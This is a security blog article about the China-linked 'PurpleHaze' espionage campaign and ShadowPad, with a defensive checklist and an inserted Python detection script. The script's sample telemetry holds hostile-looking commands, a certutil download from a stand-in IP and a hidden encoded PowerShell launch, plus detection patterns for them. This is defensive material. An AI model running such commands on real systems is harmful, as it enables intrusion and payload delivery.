PurpleHaze: China-Linked Cyberespionage Campaign Targets 70+ Organizations Worldwide

A major cyberespionage operation linked to China has come to light, affecting more than 70 organizations across the globe. Security researchers at SentinelOne have uncovered an expansive campaign they've named "PurpleHaze", believed to be the work of APT15 and UNC5174—two threat groups with ties to the Chinese government.

Running from July 2024 to March 2025, this campaign quietly infiltrated targets in key industries, including manufacturing, government, finance, telecommunications, and media. Among the victims were a logistics company that handled hardware for SentinelOne and a South Asian government entity, pointing to how far-reaching and strategic this campaign was.

The attackers used a powerful and stealthy tool called ShadowPad, a modular malware platform that’s become increasingly popular among Chinese APTs. This software allowed them to quietly extract sensitive information while staying under the radar.

What We Know About the Targets

PurpleHaze wasn’t a random attack—it was carefully planned and executed with specific goals in mind. The 70+ affected organizations span a wide range of sectors:

  • Manufacturing companies, particularly those involved in defense and aerospace
  • Government ministries and diplomatic agencies in Asia
  • Banks and financial institutions, including those involved in international aid
  • Telecom providers, especially those working on 5G or satellite networks
  • News and media firms, possibly for influence operations or surveillance

This wasn’t just about stealing information—it was about gaining long-term access to systems that could offer ongoing strategic value to China.

Who’s Behind It?

SentinelOne attributes the campaign to APT15 (also known as Ke3chang or Vixen Panda) and a lesser-known group called UNC5174. Both are believed to work under the umbrella of Chinese state-sponsored activity.

APT15 is no stranger to espionage. In the past, the group has been linked to attacks on Western military contractors, foreign ministries, and defense suppliers. They’re known for quiet, long-term surveillance and for using advanced malware to maintain persistent access without detection.

How the Attack Worked

1. Getting In

The attackers used spear-phishing emails to trick specific individuals into giving up access. They also took advantage of known vulnerabilities in public-facing infrastructure and, in some cases, exploited weaknesses in the supply chain to gain entry—such as compromising a logistics firm that worked with SentinelOne.

2. Staying Hidden

Once inside, the attackers deployed ShadowPad, a backdoor that can load plugins as needed, making it both flexible and hard to detect. They also used built-in Windows tools like PowerShell and certutil to carry out their attacks quietly.

3. Stealing Data

Data was gathered and sent back to the attackers using stealthy methods, including encrypted HTTPS connections, DNS tunnels, and hiding data inside images or documents.

4. Covering Their Tracks

The attackers tampered with logs, deleted evidence, and modified system settings to avoid detection and delay response efforts.

Why ShadowPad Is So Dangerous

ShadowPad is one of the most advanced malware tools in use today. Originally tied to APT41, it has since been adopted by multiple Chinese groups. Its modular design allows attackers to load only the features they need, making detection harder. The version used in this campaign had added encryption and stealth features, making it highly customized and difficult to analyze.

A Strategic Play by China?

The scope and precision of the PurpleHaze campaign point to a broader geopolitical strategy. Rather than simple data theft, this looks like an effort to map critical infrastructure, monitor adversaries, and quietly gather intelligence over the long term. The targeting of a SentinelOne logistics partner shows attackers are now going after defenders themselves.

What Organizations Should Do Now

Here are some critical steps to take:

  • Assume Breach: Start from the idea that you may already be compromised.
  • Look for ShadowPad: Scan for known indicators of compromise and suspicious DNS activity.
  • Monitor Lateral Movement: Check for accounts accessing unusual parts of the network.
  • Patch Everything: Prioritize updates on edge devices, VPNs, and outdated systems.
  • Upgrade Detection: Use EDR/XDR systems that focus on behavior, not just signatures.
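As an added illustration (not part of the original article or of SentinelOne's research), here is a small Python triage script that turns the behaviours described under "How the Attack Worked" and the "Look for ShadowPad" and "Monitor Lateral Movement" advice above into three checks run over constructed sample telemetry: certutil or PowerShell launched with download, decode or encoded-command switches, a DNS query whose leftmost label is long and high-entropy (a common tunnelling pattern), and Windows Security event 1102 (audit log cleared). The command lines, IP address, domains and thresholds are all constructed assumptions for the example, not indicators from the campaign.

```python
import math
import re
from collections import Counter

# Constructed sample telemetry for illustration; not indicators from the campaign.
SAMPLE_EVENTS = [
    ("proc", r"certutil.exe -urlcache -split -f http://198.51.100.7/stage.bin C:\Users\Public\stage.bin"),
    ("proc", "powershell.exe -NoP -W Hidden -enc QUJD"),
    ("proc", r"powershell.exe -File C:\scripts\backup.ps1"),
    ("dns", "q3n8v0z1k2m5x7c9.cdn-static.example"),
    ("dns", "mail.example"),
    ("evt", "EventID=1102 Channel=Security Message=The audit log was cleared."),
    ("evt", "EventID=4624 Channel=Security Message=An account was successfully logged on."),
]

# Living-off-the-land switches worth a second look (assumed rule set; extend as needed).
LOLBIN_RULES = {
    "certutil.exe": re.compile(r"-(urlcache|decode)\b", re.I),
    "powershell.exe": re.compile(r"-(enc|encodedcommand)\b|-w\s+hidden", re.I),
}

def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking tunnel labels score close to log2(alphabet size)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def suspicious_dns_label(qname: str, min_len: int = 16, min_entropy: float = 3.5) -> bool:
    """Assumed thresholds: a long, high-entropy leftmost label is a tunnelling hint, not proof."""
    label = qname.split(".")[0]
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy

def suspicious_process(cmdline: str) -> bool:
    """Match the executable name (any leading path stripped) against its LOLBin rule, if one exists."""
    exe = (cmdline.split() or [""])[0].rsplit("\\", 1)[-1].lower()
    rule = LOLBIN_RULES.get(exe)
    return bool(rule and rule.search(cmdline))

def triage(events):
    """Return (category, record) pairs for every record that one of the three checks flags."""
    hits = []
    for source, record in events:
        if source == "proc" and suspicious_process(record):
            hits.append(("lolbin", record))
        elif source == "dns" and suspicious_dns_label(record):
            hits.append(("dns-tunnel-candidate", record))
        elif source == "evt" and "EventID=1102" in record:  # Security audit log cleared
            hits.append(("log-cleared", record))
    return hits
```

Each hit is a lead for a human analyst to confirm against EDR and DNS logs, not a verdict; tune the thresholds and rule set to what is normal in your own environment.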

Final Thoughts

The PurpleHaze campaign is a clear signal that cyberespionage has become a battleground for global power struggles. This wasn’t a smash-and-grab operation—it was a silent, strategic infiltration. If you’re part of a critical industry, you're a target. It's time to get serious about layered security, threat hunting, and supply chain protection.

For more insights and updates on cybersecurity, AI advancements, and cyberespionage, visit NorthernTribe Insider. Stay secure, NorthernTribe.
